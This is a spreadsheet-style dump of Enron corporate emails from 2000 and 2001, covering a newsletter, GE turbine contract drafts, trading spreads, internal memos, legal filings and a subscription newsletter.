NUGGETS &amp; NOTES_x000D_
_x000D_
=01&amp;Go Big or Go Home=018 =01) Mike McConnell/President &amp; CEO-EGM_x000D_
_x000D_
"Call Back" - Don Schroeder, VP/Crude Trading-EGM_x000D_
_x000D_
_x000D_
REMINDER_x000D_
_x000D_
Holiday Party_x000D_
Enron North America, Global Markets and Industrial Markets_x000D_
Enron Field_x000D_
Saturday, December 9_x000D_
7:00 - Midnight_x000D_
_x000D_
WELCOME_x000D_
New Hires ENA/EIM/EGM_x000D_
ENA =01) Joseph Taylor, Jennifer Rosado, Rabi De, Louis Dicarlo, Scott Chur=_x000D_
bock,=20_x000D_
Kenneth Parkhill, Nicholas Ernst, Dirk Dimitry, Stephanie Taylor, Dimitri=_x000D_
=20_x000D_
Tagaropulos, Georgia Blanchard, Jona Kimbrough, Jeffrey Baldwin, Patricia=_x000D_
=20_x000D_
English, Jaesoo Lew, Cheryl Nelson, Gina Abbott, Ryan Keith, Brian Dawson_x000D_
EGM =01)Ellen Alexander, Mike Perun_x000D_
_x000D_
Transfers to ENA/EIM/EGM_x000D_
ENA =01) Gregory Golden_x000D_
EGM =01) Keynan Dutton_x000D_
_x000D_
_x000D_
FROM THE EDITORS_x000D_
_x000D_
Thank you to all the contributors to this week's EnTouch.  We want to hear=_x000D_
=20_x000D_
from the various departments within Enron Americas, Global Markets and=20_x000D_
Industrial Markets!  Please continue to send your business highlights,=20_x000D_
nuggets &amp; notes or suggestions to Michelle Vitrella or Kathie Grabstald._x000D_
_x000D_
_x000D_
LEGAL STUFF_x000D_
_x000D_
The information contained in this newsletter is confidential and proprietar=_x000D_
y=20_x000D_
to Enron Corp. and its subsidiaries.  It is intended for internal use only=_x000D_
=20_x000D_
and should not be disclosed.</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 01:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dale.rasmussen@enron.com', 'stuart.zisman@enron.com'})</t>
  </si>
  <si>
    <t>Gas Turbine Purchase Agreement.DOC</t>
  </si>
  <si>
    <t xml:space="preserve">This is the most current clean version of the GE breakout contract.  You have _x000D_
also received a list of site specific references in the contract to assist in _x000D_
the preparation of the final document.  _x000D_
_x000D_
I will contact Kent Shoemaker today to see how close we are on the form.  It _x000D_
is my understanding that the lawyers involved in the projects will take the _x000D_
laboring oar once the form is ready to go._x000D_
_x000D_
I'll let you know as soon as I hear something from GE.  I am also trying to _x000D_
set up a meeting with ABB today or tomorrow.  I will send you the current _x000D_
version of that contract as well, although we have not had any input from ABB _x000D_
on it yet._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 11/16/2000 09:08 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Lindo, Jacqueline E." &lt;jacquelinelindo@akllp.com&gt; on 11/14/2000 08:59:23 AM_x000D_
To: &lt;kay.mann@enron.com&gt;_x000D_
cc: "Pipitone, Paul" &lt;paulpipitone@akllp.com&gt;, "Cobb, Chris" _x000D_
&lt;chriscobb@akllp.com&gt; _x000D_
_x000D_
Subject: Gas Turbine Purchase Agreement.DOC_x000D_
_x000D_
_x000D_
_x000D_
 Attached please find a clean copy of Version 6 of the GE Turbine_x000D_
Agreement._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 &lt;&lt;Gas Turbine Purchase Agreement.DOC&gt;&gt; _x000D_
 - Gas Turbine Purchase Agreement.DOC_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Jul 2000 08:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.koenig@enron.com'})</t>
  </si>
  <si>
    <t>Latest Net Work Section for 2Q</t>
  </si>
  <si>
    <t xml:space="preserve">Net Works section of the NYC presentation.  MEK_x000D_
---------------------- Forwarded by Mark Koenig/Corp/Enron on 07/21/2000 _x000D_
03:42 PM ---------------------------_x000D_
_x000D_
_x000D_
Michael Darnall_x000D_
07/20/2000 05:32 PM_x000D_
To: Greg Whalley/HOU/ECT@ECT, Mike McConnell/HOU/ECT@ECT, Jeffrey _x000D_
McMahon/HOU/ECT@ECT_x000D_
cc: Mark Koenig/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Latest Net Work Section for 2Q_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 06:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bob.carter@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Most recent (but not final) Turbopark/GE contract.  More to come..._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 11/13/2000 02:06 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Thompson, Peter J." &lt;peterthompson@akllp.com&gt; on 11/13/2000 01:27:59 PM_x000D_
To: "Kay Mann (E-mail)" &lt;kay.mann@enron.com&gt;_x000D_
cc: "Pipitone, Paul" &lt;paulpipitone@akllp.com&gt;, "Cobb, Christopher" _x000D_
&lt;christophercobb@akllp.com&gt; _x000D_
_x000D_
Subject: Gas Turbine Purchase Agreement.DOC_x000D_
_x000D_
_x000D_
 &lt;&lt;Gas Turbine Purchase Agreement.DOC&gt;&gt;_x000D_
_x000D_
Sorry for the delay.  Here is the most recent draft of the GE Turbine_x000D_
Agreement.  I will send the blackline shortly (I hope)._x000D_
 - Gas Turbine Purchase Agreement.DOC_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 08:30:30 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: EES - Mid-Offers</t>
  </si>
  <si>
    <t>What a piece of shit this whole BTU market is.   Your mid-offer spreads look very reasonable to me._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Herndon, Rogers  _x000D_
Sent:	Thursday, November 15, 2001 10:26 AM_x000D_
To:	Presto, Kevin M._x000D_
Subject:	EES - Mid-Offers_x000D_
_x000D_
Orig is starting to throw a fit about our widening of mid-offers due to liquidity concerns._x000D_
_x000D_
FYI we widened them as follows_x000D_
_x000D_
Bal year: $0.50_x000D_
Cal '02 : $1.00_x000D_
Cal '03: $1.50_x000D_
Cal '04 :$2.00_x000D_
Etc_x000D_
_x000D_
May pull back in by $0.50 if it looks like liquidity is returning farther out the curve._x000D_
_x000D_
Need any crude?_x000D_
_x000D_
RH</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 04:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Hunter S Shively/HOU/ECT on 09/25/2000 _x000D_
11:14 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ted C Bland                           08/31/2000 01:29 PM_x000D_
	_x000D_
_x000D_
To: Hunter S Shively/HOU/ECT@ECT, Billy Lemmons/Corp/Enron@ENRON, George _x000D_
McCormick/HOU/ECT@ECT, Carl Tricoli/Corp/Enron@Enron, Edward D _x000D_
Baughman/HOU/ECT@ECT, Daniel Reck/HOU/ECT@ECT_x000D_
cc: Stacey Dempsey/HR/Corp/Enron@ENRON _x000D_
Subject: ENA Analyst and Associate "Brownbag" Presentations_x000D_
_x000D_
_x000D_
Thanks for helping out.  Below is Dave's memo explaining the purpose of the _x000D_
program and abrief outline for the presentations.  If you have any questions _x000D_
please call me at 3-5275.  Also, attached is the tentative schedule with each _x000D_
presenter.  We will fill in any  blanks.  Ted_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Ted C Bland/HOU/ECT on 08/31/2000 01:20 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  David W Delainey                           08/29/2000 02:09 PM_x000D_
	_x000D_
_x000D_
Sent by: Kay Chapman_x000D_
To: Tim Belden/HOU/ECT@ECT, Kevin M Presto/HOU/ECT@ECT, John _x000D_
Arnold/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT, Hunter S Shively/HOU/ECT@ECT, _x000D_
Phillip K Allen/HOU/ECT@ECT, Janet R Dietrich/HOU/ECT@ECT, Christopher F _x000D_
Calger/PDX/ECT@ECT, W David Duran/HOU/ECT@ECT, Raymond Bowen/HOU/ECT@ECT, _x000D_
Jeff Donahue/HOU/ECT@ECT, Brian Redmond/HOU/ECT@ECT, C John _x000D_
Thompson/Corp/Enron@ENRON, Scott Josey/Corp/Enron@ENRON, Rob _x000D_
Milnthorp/CAL/ECT@ECT, Max Yzaguirre/NA/Enron@ENRON, Beth _x000D_
Perlman/HOU/ECT@ECT, Wes Colwell/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, David _x000D_
Oxley/HOU/ECT@ECT, Joseph Deffner/HOU/ECT@ECT, Jordan Mintz/HOU/ECT@ECT, Mark _x000D_
E Haedicke/HOU/ECT@ECT, John J Lavorato/Corp/Enron@Enron, Mike _x000D_
McConnell/HOU/ECT@ECT, Gary Hickerson/HOU/ECT@ECT, Rodney _x000D_
Malcolm/HOU/ECT@ECT, George McClellan/HOU/ECT@ECT, Jere C _x000D_
Overdyke/HOU/ECT@ECT, Jeffrey A Shankman/HOU/ECT@ECT, Jean _x000D_
Mrha/NA/Enron@Enron, Mark Frevert/NA/Enron@Enron, Vince J Kaminski/HOU/ECT@ECT_x000D_
cc: Mollie Gustafson/PDX/ECT@ECT, Felicia Doan/HOU/ECT@ECT, Ina _x000D_
Rangel/HOU/ECT@ECT, Kimberly Brown/HOU/ECT@ECT, Airam Arteaga/HOU/ECT@ECT, _x000D_
Christy Chapman/HOU/ECT@ECT, Tina Rode/HOU/ECT@ECT, Marsha _x000D_
Schiller/HOU/ECT@ECT, Lillian Carroll/HOU/ECT@ECT, Tonai _x000D_
Lehr/Corp/Enron@ENRON, Nicole Mayer/HOU/ECT@ECT, Darlene C _x000D_
Forsyth/HOU/ECT@ECT, Janette Elbertson/HOU/ECT@ECT, Angela _x000D_
McCulloch/CAL/ECT@ECT, Pilar Cerezo/NA/Enron@ENRON, Cherylene R _x000D_
Westbrook/HOU/ECT@ECT, Shirley Tijerina/Corp/Enron@ENRON, Nicki _x000D_
Daw/NA/Enron@Enron, Kimberly Hillis/HOU/ECT@ect, Patti Thompson/HOU/ECT@ECT, _x000D_
Cathy Phillips/HOU/ECT@ECT, Stella L Ely/HOU/ECT@ECT, Ana _x000D_
Alcantara/HOU/ECT@ECT, Angie Collins/HOU/ECT@ECT, Donna Baker/HOU/ECT@ECT, _x000D_
Jennifer Burns/HOU/ECT@ECT, Melissa Jones/NA/Enron@ENRON, Shirley _x000D_
Crenshaw/HOU/ECT@ECT, Ted C Bland/HOU/ECT@ECT, Tim O'Rourke/Corp/Enron@Enron, _x000D_
David Oxley/HOU/ECT@ECT, Rhonna Palmer/HOU/ECT@ECT _x000D_
Subject: ENA Analyst and Associate "Brownbag" Presentations_x000D_
_x000D_
_x000D_
It is the intent of the Office of the Chairman to maintain a high quality _x000D_
flow of Analysts and Associates rotating through Enron North America as well _x000D_
as provide them with up to date information on all the potential rotations in _x000D_
ENA.  Additionally, we would like to provide the ENA AA's a forum for your _x000D_
respective groups to promote your business unit as a viable alternative in _x000D_
the rotation process.  I need your assistance for this endeavor and want your _x000D_
respective business unit to participate in the process by delivering an _x000D_
informal presentation to the AA group which should include the following:_x000D_
_x000D_
Your business unit's current activities, purpose and interfaces with other _x000D_
departments_x000D_
Recent successes and current projects_x000D_
Ideas on the horizon_x000D_
Opportunities in your business unit for AA's _x000D_
The benifits of rotation in your business unit_x000D_
An open Q&amp;A session_x000D_
_x000D_
These presentations should be informal and it is not necessary to have _x000D_
handouts.  The goal is to provide an open forum for the AA's and to have them _x000D_
ask questions about each business unit.  Also, bringing one of your current _x000D_
AA's with you to provide their insight might help stimulate discussion.  Ted _x000D_
Bland will be contacting you to schedule your business unit for a _x000D_
presentation.  The first "brownbag" will take place September 8 between _x000D_
12:00pm and 1:00pm in Room 30 C1._x000D_
_x000D_
Dave_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Mar 2000 08:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Please could you inform me of all the discussions we are having_x000D_
 with companies on the ETA / PA changes</t>
  </si>
  <si>
    <t xml:space="preserve">Mark,_x000D_
_x000D_
Would appreciate a discussion on this._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Dave_x000D_
---------------------- Forwarded by David Forster/LON/ECT on 03/14/2000 04:30 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Edmund Cooper_x000D_
03/14/2000 04:21 PM_x000D_
To: Louise Kitchen/LON/ECT@ECT_x000D_
cc: Amita Gosalia/LON/ECT@ECT, Justin Boyd/LON/ECT@ECT, David _x000D_
Forster/HOU/ECT@ECT, Richard Lewis/LON/ECT@ECT _x000D_
_x000D_
Subject: Re: Please could you inform me of all the discussions we are having _x000D_
with companies on the ETA / PA changes  _x000D_
_x000D_
Louise,_x000D_
_x000D_
No changes have been made to ETAs or PAs.  _x000D_
_x000D_
In the case of National Power they requested an anodyne clarification of a _x000D_
clause in the ETA (one of the same points TXU required clarification - I had _x000D_
emailed Dave a copy of that letter). We are planning to send them a letter to _x000D_
that effect  (copy attached).  It does not constitute an amendment to the _x000D_
ETA.  As it hasn't yet been sent youself or Dave can veto it._x000D_
_x000D_
Thanks, Edmund._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Louise Kitchen_x000D_
03/14/2000 04:03 PM_x000D_
To: Amita Gosalia/LON/ECT@ECT_x000D_
cc: Edmund Cooper/LON/ECT@ECT _x000D_
_x000D_
Subject: Re: Please could you inform me of all the discussions we are having _x000D_
with companies on the ETA / PA changes_x000D_
_x000D_
It is already policy - see below_x000D_
_x000D_
Edmund - who agreed the NP changes - Dave?_x000D_
---------------------- Forwarded by Louise Kitchen/LON/ECT on 14/03/2000 _x000D_
10:02 ---------------------------_x000D_
_x000D_
_x000D_
Louise Kitchen_x000D_
25/01/2000 10:36_x000D_
To: Justin Boyd/LON/ECT@ECT_x000D_
cc: Edmund Cooper/LON/ECT@ECT _x000D_
_x000D_
Subject: Re: Please could you inform me of all the discussions we are having _x000D_
with companies on the ETA / PA changes  _x000D_
_x000D_
Let's be clear there are no changes unless approved directly by myself or _x000D_
Dave Forster._x000D_
_x000D_
I notice Eastern are trading and I have approved no changes and Dave has been _x000D_
away since the issue was raised.  So how come they are on?_x000D_
_x000D_
_x000D_
_x000D_
Justin Boyd_x000D_
25/01/2000 09:13_x000D_
To: Louise Kitchen/LON/ECT@ECT_x000D_
cc: Edmund Cooper/LON/ECT@ECT _x000D_
_x000D_
Subject: Re: Please could you inform me of all the discussions we are having _x000D_
with companies on the ETA / PA changes  _x000D_
_x000D_
louise,_x000D_
_x000D_
the companies are:_x000D_
_x000D_
ruhrgas (awaiting their written comments)_x000D_
eastern (significant changes)_x000D_
conoco (one minor change only)_x000D_
rwe (significant changes)_x000D_
_x000D_
 justin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Louise Kitchen_x000D_
24/01/2000 20:35_x000D_
To: Justin Boyd/LON/ECT@ECT, Edmund Cooper/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Please could you inform me of all the discussions we are having with _x000D_
companies on the ETA / PA changes_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 2 Nov 2001 11:15:34 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.leboe@enron.com', 'gay.mayeux@enron.com'})</t>
  </si>
  <si>
    <t>FW: AFL-CIO Press Release</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
fyi_x000D_
 -----Original Message-----_x000D_
From: 	Fleming, Rosalee   On Behalf Of Lay, Kenneth_x000D_
Sent:	Friday, November 02, 2001 11:51 AM_x000D_
To:	Koenig, Mark; Kean, Steven J.; Palmer, Mark A. (PR); Derrick Jr., James; Tilney, Elizabeth; Whalley, Greg; McMahon, Jeffrey; Bowen Jr., Raymond_x000D_
Subject:	FW: AFL-CIO Press Release_x000D_
_x000D_
Press release attached._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Damon Silvers" &lt;Dsilvers@aflcio.org&gt;@ENRON  _x000D_
Sent:	Friday, November 02, 2001 11:18 AM_x000D_
To:	Lay, Kenneth_x000D_
Subject:	AFL-CIO Press Release_x000D_
_x000D_
_x000D_
Ken,_x000D_
 _x000D_
The attached was inadvertantly omitted from my earlier  email.  My apologies._x000D_
 _x000D_
 _x000D_
Damon A. Silvers_x000D_
Associate General Counsel_x000D_
AFL-CIO_x000D_
815 16th Street, N.W._x000D_
Washington, DC 20006_x000D_
(202) 637-3953_x000D_
fax (202) 637-5323DSilvers@aflcio.org _x000D_
 _x000D_
 - AFL-CIO Enron press release.doc </t>
  </si>
  <si>
    <t>Mon, 5 Nov 2001 12:36:59 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Master Netting Agreements</t>
  </si>
  <si>
    <t>Please do UUC Search on the FPL Energy Power Marketing, Inc.  Counterparty in attached Master Netting Agreement._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Steve Van Hooser_x000D_
_x000D_
713-853-7238_x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Heard, Marie  _x000D_
Sent:	Monday, November 05, 2001 1:35 PM_x000D_
To:	Aronowitz, Alan; Athena Alexander (E-mail); Clark, Morris; Cook, Mary; David Mitchell (E-mail); Davis, Angela; Del vecchio, Peter; Douglas, Stephen H.; Evans, Mark (London Legal); Gray, Barbara N.; Hansen, Leslie; Heard, Marie; Hendry, Brent; Hodge, Jeffrey T.; Jones, Tana; Keohane, Peter; Koehler, Anne C.; Lech Kalembka (E-mail); Leite, Francisco Pinto; Marissa Morelle (E-mail); McCullough, Travis; Mellencamp, Lisa; Murphy, Harlan; Murray, Julia; Nemec, Gerald; Portz, David; Rick Antonoff (E-mail); Rohauer, Tanya; Sager, Elizabeth; Sayre, Frank; Shackleton, Sara; Simons, Paul; St. Clair, Carol; Van Hooser, Steve; Viverito, John; Williams, Jason R (Credit)_x000D_
Subject:	Master Netting Agreements_x000D_
_x000D_
In order for Cadwalader to be in a position to order lien searches, please e-mail Lech Kalembka (Lech.Kalembka@cwt.com) the initial draft of your Master Netting Agreement(s).  When your agreement is finalized, please e-mail Lech a copy of the final draft so that he can prepare the financing statement filings._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Marie</t>
  </si>
  <si>
    <t>Mon, 6 Nov 2000 07:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>service list</t>
  </si>
  <si>
    <t xml:space="preserve">Here it is.  It also includes Naomi's name/address._x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 03:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>InfoBeat Fun - Daily Dose - Nov. 14, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
_x000D_
November 14, 2000_x000D_
_x000D_
_x000D_
_x000D_
To modify your profile, or to subscribe, click here. _x000D_
_x000D_
_x000D_
_x000D_
Click here for sponsor_x000D_
 _x000D_
_x000D_
_x000D_
Cool Site of the Day _x000D_
_x000D_
Fact of the Day _x000D_
_x000D_
_x000D_
_x000D_
Quote of the Day _x000D_
_x000D_
Born Today _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Click here for sponsor_x000D_
Click on Ad -- Support InfoBeat's Free Services_x000D_
_x000D_
_x000D_
 _x000D_
Cool Site of the Day_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
The ancient Chinese art of origami (which literally means "to fold paper") is _x000D_
remarkably documented at Joseph Wu's Origami Page. And whether you're a _x000D_
seasoned pro or have never heard the term until now, you've got to check this _x000D_
site out. For the uninitiated, there are many galleries to roam around that _x000D_
contain some of the wildest paperfolding you will surely ever see - check out _x000D_
Wu's own paper microscope for proof. You will also find the history of the _x000D_
art, links to origami sites across the entire Web, instructions on how to _x000D_
learn the art, supply information, and plenty of diagrams on how to perfect _x000D_
some of the more popular folds. Old pros will find a community thriving here _x000D_
that will support even the most wild paper-folders out there. Get to it! _x000D_
www.origami.vancouver.bc.ca  _x000D_
_x000D_
Return to Top_x000D_
_x000D_
_x000D_
 _x000D_
Fact of the Day_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
The average cost of air travel clocks in at about $60 per hour while using _x000D_
the handy airphone during one's trip can cost as much as $160 per hour. For _x000D_
more, click here. _x000D_
_x000D_
Return to Top_x000D_
_x000D_
_x000D_
 _x000D_
Quote of the Day_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
Thought For Today: "If you hate a person, you hate something in him that is _x000D_
part of yourself. What isn't part of ourselves doesn't disturb us." - Herman _x000D_
Hesse, novelist (1877-1962). _x000D_
_x000D_
Return to Top_x000D_
_x000D_
_x000D_
 _x000D_
Born Today_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
- Actress Rosemary DeCamp is 90._x000D_
- Former U.N. Secretary-General Boutros Boutros-Ghali is 78._x000D_
- Actress Kathleen Hughes is 72._x000D_
- Jazz musician Ellis Marsalis is 66._x000D_
- Actor Don Stewart is 64._x000D_
- Blues singer Carey Bell is 64._x000D_
- Pop singer Freddie Garrity (Freddie and the Dreamers) is 60._x000D_
- Writer P.J. O'Rourke is 53._x000D_
- Zydeco singer-musician Buckwheat Zydeco is 53._x000D_
- Britain's Prince Charles is 52._x000D_
- Actor Robert Ginty is 52._x000D_
- Rock singer-musician James Young (Styx) is 52._x000D_
- Singer Stephen Bishop is 49._x000D_
- Actress Laura San Giacomo is 39._x000D_
- Actor D.B. Sweeney is 39._x000D_
- Rapper Run (Run-DMC) is 36._x000D_
- Actor Patrick Warburton is 36._x000D_
- Rock singer Butch Walker (Marvelous 3) is 31._x000D_
- Rock musician Nic Dalton (Lemonheads) is 36._x000D_
- Rapper Shyheim is 23._x000D_
_x000D_
Source: Associated Press_x000D_
_x000D_
Return to Top_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
[IMAGE][IMAGE][IMAGE]_x000D_
_x000D_
Click on Ad -- Support InfoBeat's Free Services_x000D_
Click here for sponsor_x000D_
_x000D_
_x000D_
Receive comics, horoscopes, and more in your email every day! _x000D_
Sign up for InfoBeat Fun or any of InfoBeat's other personalized email _x000D_
services at _x000D_
www.InfoBeat.com. _x000D_
_x000D_
_x000D_
 You are subscribed with e-mail address:  [judy.hernandez@enron.com] _x000D_
_x000D_
_x000D_
 InfoBeat:   News | Weather | Snow | Finance | Sports | Entertainment _x000D_
Fun | Reminders | Classifieds | MarketPlace _x000D_
Home | User Profile | Feedback | About Us | Terms _x000D_
_x000D_
 , 2000 indimi, inc. All rights reserved._x000D_
InfoBeat is a registered tradmark of indimi, inc._x000D_
InfoBeat services are for personal use only._x000D_
Commercial use or redistribution in any form, printed or electronic, is _x000D_
prohibited._x000D_
_x000D_
 _x000D_
To unsubscribe, go to the individual service profile and click unsubscribe, _x000D_
or send an e-mail   feedback@infobeat.com  with the word "unsubscribe" in the _x000D_
subject line. _x000D_
</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 05:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Canadian Prepay</t>
  </si>
  <si>
    <t xml:space="preserve">I checked w/Mark Taylor, and he can't approve me going to Calgary until he _x000D_
checks it with Mark Haedicke to see if it's OK, which he won't do until he _x000D_
gets back in town, which is in two weeks.  I hope that isn't going to cause _x000D_
any problems..._x000D_
_x000D_
_x000D_
_x000D_
	Greg Johnston_x000D_
	11/10/2000 11:20 AM_x000D_
		_x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Canadian Prepay_x000D_
_x000D_
I actually received the last document I need to put otgether binders this _x000D_
week.  Linda and I will compile closing binders with all the relevant _x000D_
documents next week and send you one set for your files.  I will send copies _x000D_
of the RBC documents to Rick at the same time._x000D_
_x000D_
So, when are you going to come and enjoy our crisp weather?  Mark Taylor _x000D_
e-mailed me saying he thought it was a good idea for you to come up here to _x000D_
train Linda and Sharon.  It ain't Stampede, but at least Peter and I can _x000D_
return the hospitality._x000D_
_x000D_
_x000D_
From: Tana Jones on 11/10/2000 11:15 AM CST_x000D_
To: Greg Johnston/CAL/ECT@ECT_x000D_
cc:  _x000D_
Subject: Canadian Prepay_x000D_
_x000D_
Rick Borden at Macleod Dixon sent us a fax requesing copies of the documents _x000D_
on the prepay.  Can you send him a copy?  Also, when they're all together, _x000D_
can you send a copy to me for our files.  Thanks!_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 09:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chj@aelaw.com'})</t>
  </si>
  <si>
    <t>frozenset({'sscott3@enron.com', 'andy.bettwy@swgas.com', 'tah@cpuc.ca.gov', 'rczahar@aol.com', 'garyb@abag.ca.gov', 'eklinkner@ci.pasadena.ca.us', 'napedersen@jonesday.com', 'porterdk@sce.com', 'thompson@wrightlaw.com', 'burkee@cts.com', 'salleyoo@dwt.com', 'jwr@cpuc.ca.gov', 'raw@cpuc.ca.gov', 'regaffairs@sf.whitecase.com', 'askaff@energy-law-group.com', 'jkarp@whitecase.com', 'johnwalley@swgas.com', 'slins@ci.glendale.ca.us', 'aod@newsdata.com', 'ceyap@earthlink.net', 'rochmanm@spurr.org', 'jweil@aglet.org', 'bjeider@ci.burbank.ca.us', 'davef@abag.ca.gov', 'raveen_maan@cerberus.city.palo-alto.ca.us', 'gtbl@dynegy.com', 'mjaske@energy.state.ca.us', 'kfyip@seiworldwide.com', 'sbs@cpuc.ca.gov', 'jtachera@energy.state.ca.us', 'jsteffen@iid.com', 'jmct@gmssr.com', 'vjb@cpuc.ca.gov', 'kbhensman@aeraenergy.com', 'rick.counihan@greenmountain.com', 'rbw@mrwassoc.com', 'mark.c.moench@wgp.twc.com', 'evk1@pge.com', 'rochmanm@cubjpa.org', 'jmpa@dynegy.com', 'bcragg@gmssr.com', 'johnj@bcjlaw.com', 'furutanj@efawest.navfac.navy.mil', 'ron_oechsler@rmiinc.com', 'kmccrea@sablaw.com', 'rpelote@energy.twc.com', 'plg@cpuc.ca.gov', 'alan_reid@pcp.ca', 'rmp@cpuc.ca.gov', 'mdjoseph@adamsbroadwell.com', 'joseh@lif.org', 'chilen@llgm.com', 'lindseyhowdowning@dwt.com', 'bwood@energy.state.ca.us', 'lmh@eslawfirm.com', 'tomb@crossborderenergy.com', 'rgloistein@orrick.com', 'jcattermole@pcenergy.com', 'ram@cpuc.ca.gov', 'iep@iepa.com', 'mday@gmssr.com', 'bho@cpuc.ca.gov', 'edf@cpuc.ca.gov', 'eke@aelaw.com', 'chris.king@utility.com', 'ghinners@reliantenergy.com', 'haorndorff@aeraenergy.com', 'stomashe@energy.state.ca.us', 'mcn@cpuc.ca.gov', 'rfoss@coral-energy.com', 'marcel@turn.org', 'epoole@adplaw.com', 'tdickers@westerngas.com', 'inggm@sce.com', 'igsinc@ix.netcom.com', 'alb@cpuc.ca.gov', 'ewo@jmbm.com', 'chj@aelaw.com', 'pjpowerlaw@aol.com', 'tom.roth@et.pge.com', 'karen@klindh.com', 'dcarroll@dbsr.com', 'ronknecht@aol.com', 'craigc@calpine.com', 'ed@clfp.com', 'eyq@cpuc.ca.gov', 'grant_kolling@cerberus.city.palo-alto.ca.us', 'rpetti@ladwp.com', 'jleslie@luce.com', 'skatz@sempratrading.com', 'gsullivan@sempra.com', 'kmills@cfbf.com', 'ltt@cpuc.ca.gov'})</t>
  </si>
  <si>
    <t>Opening Brief of Aera Energy LLC</t>
  </si>
  <si>
    <t>Attached please find the Opening Brief of Aera Energy LLC, in Word format,_x000D_
that was filed today at the Commission.  It is also being served in hard_x000D_
copy on all parties on the service list.  Please call me at (415) 421.4143_x000D_
if you have any questions._x000D_
_x000D_
Christine Jun_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Christine H. Jun (E-mail).vcf_x000D_
 - FINAL - Aera Opening Brief 071000.doc</t>
  </si>
  <si>
    <t>Wed, 1 Nov 2000 09:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rob.gramlich@neg.pge.com'})</t>
  </si>
  <si>
    <t>Re: Pat Wood</t>
  </si>
  <si>
    <t>My bet is that Pat will be at NARUC.  I think that Michael Moore, PhD _x000D_
Economist and CEC commissioner would be very good (I tried Bilas--he's got a _x000D_
conflict) and don't think it's a problem that he and Larson are both on _x000D_
because they'll come with two quite different takes.  _x000D_
_x000D_
P.S. FERC dropped a bomb on California today.</t>
  </si>
  <si>
    <t>Mon, 3 Sep 2001 07:49:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cam@pjm.com'})</t>
  </si>
  <si>
    <t>frozenset({'ssharma@enron.com', 'rring@enron.com'})</t>
  </si>
  <si>
    <t>MUI access terminated</t>
  </si>
  <si>
    <t>Suneet (T) Sharma     (enron)&lt;ssharma@enron.com&gt;,_x000D_
_x000D_
The following qualifications on your user account have been terminated:_x000D_
_x000D_
eData General_x000D_
_x000D_
If you have any questions please contact your account manager(s):_x000D_
_x000D_
